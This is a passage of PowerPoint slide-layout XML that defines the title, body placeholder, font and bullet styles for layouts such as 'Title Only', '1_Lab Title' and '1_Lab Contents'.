              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18353604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Bullets (Numbered) with Lead-in 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457200" y="369888"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Lucida Sans"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1350" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1114427"/>
            <a:ext cx="8258175" cy="4305935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F38127"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" marR="0" lvl="1" indent="-34925" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="639366" marR="0" lvl="2" indent="-36114" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="901304" marR="0" lvl="3" indent="-40878" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1156097" marR="0" lvl="4" indent="-38496" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" marR="0" lvl="5" indent="28575" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2228850" marR="0" lvl="6" indent="28575" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2571750" marR="0" lvl="7" indent="28575" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1350" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2914650" marR="0" lvl="8" indent="28575" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1711987851"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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cSld name="Title Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 31"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14524805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1_Lab Title">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 39"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Shape 40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502003" y="1579564"/>
            <a:ext cx="2641997" cy="5278437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449264" y="1138992"/>
            <a:ext cx="8229600" cy="792791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449264" y="2093495"/>
            <a:ext cx="5229642" cy="3418940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F38127"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="220265" marR="0" lvl="1" indent="-105965" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="603647" marR="0" lvl="2" indent="-226219" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="815579" marR="0" lvl="3" indent="-97631" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans"/>
                <a:ea typeface="Merriweather Sans"/>
                <a:cs typeface="Merriweather Sans"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1543050" marR="0" lvl="4" indent="-57150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1885950" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2228850" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="2571750" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="2914650" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14617314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1_Lab Contents">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 43"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Shape 44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="24000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6502003" y="1579564"/>
            <a:ext cx="2641997" cy="5278437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="350839"/>
            <a:ext cx="8229600" cy="411163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="Calibri" charset="0"/>
                <a:cs typeface="Calibri" charset="0"/>
                <a:sym typeface="Merriweather Sans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" marR="0" lvl="1"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2pPr>
            <a:lvl3pPr marL="0" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="0" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="0" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="342900" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="685800" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="1028700" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="1371600" marR="0" lvl="8"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449266" y="1206504"/>
